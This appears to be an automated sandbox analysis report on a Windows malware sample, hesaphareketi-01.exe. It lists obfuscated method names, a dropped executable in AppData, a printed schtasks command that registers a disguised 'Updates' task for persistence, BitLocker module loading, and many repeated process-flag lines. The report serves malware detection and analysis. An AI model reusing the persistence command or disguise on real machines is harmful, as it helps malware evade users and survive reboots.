Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, iEdKtAhoOZ61OEIwZf.cs	High entropy of concatenated method names: 'Pk8AliZojn', 'jbEAMxtRT5', 'F7FAuWbynl', 'u3MAsNyCnE', 'hXTAGaQsLQ', 'NBlARIOV7v', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, QqJtG6Fm8l5o2Jes3n.cs	High entropy of concatenated method names: 'RdA2cXxPBi', 'oNR274dYNl', 'ToString', 'Sa02O2DZis', 'tuP2poTc81', 'GuF21Ss8Ih', 'Ju92HwW4os', 'fcJ2Klkhhl', 'e272LoWvFF', 'gkw2rgKVWr'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, Mj7IHJPEgFkKQb2HIB.cs	High entropy of concatenated method names: 'uOXAOfRwYO', 'uLDApfRpLd', 'iSOA1r3WbM', 'jWPAH8s5jm', 'zsUAKGOWTw', 'RXUAL4bruP', 'Yf1Arjnegj', 'zOiAIl83Ia', 'yBOAcbHYm3', 'viHA72gUYW'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, dO4cCFGreIfcTfcEoq.cs	High entropy of concatenated method names: 'CT3K090LuZ', 'G9sKpJqPGd', 'vRkKH3HWmF', 'qHdKLRsXYR', 'yAtKreTfru', 'bsAHWhAW0V', 'qDgHQIPw5c', 'ztNHoMQmGH', 'kZGHgZqyVi', 'u3rHZLRqqm'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, FqGxhrDon3ZgwcSj4E.cs	High entropy of concatenated method names: 'nKVPmqgSj3', 'bK2PEDRS5Y', 'yADPf6llpn', 'VUDPOb4Vqv', 'RCGPpjXFXp', 'kmNPHPW3sW', 'Dm4PKQlUaf', 'GZtAoXIIHV', 'sR4Ag0IUEJ', 'Tu9AZ25sG1'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, WEcm2lgpsOIjQaW3Ww.cs	High entropy of concatenated method names: 'fXemLDXEIB', 'eDymru7CjA', 'JDbmcIxKsj', 'Xlim78tXvg', 'ra8mhSW4Gv', 'wcamkSKYes', 'IjC5hroY0wJLd4Dk0U', 'Jm6Ck8WaL4bhiFyDDw', 'qbYmmPHKji', 'l26mEXBaeo'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, IXiuyndR63KB667cvG.cs	High entropy of concatenated method names: 'MbUHUTuvaq', 'RNnH3xLSBW', 'o8w1ugfSly', 'zSn1s3DCUm', 'dOY1RH4M11', 'wNt16rfnrY', 'MYi1eRThbc', 'hKi14564hY', 'noH1VEarSS', 'axs1qmGMvm'
Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, p7tuS7CtYtgO2dJ1Ly.cs	High entropy of concatenated method names: 'DFT2g7XXW1', 'cGu2iclsp3', 'XYsAngdTwq', 'FpCAmNF5km', 'gse2JxEg2N', 'gik2YLUjMY', 'qOs2jflFqv', 'tim2GWli8M', 'ecX2CBUKc5', 'NXp2S8X62m'

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

File created: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
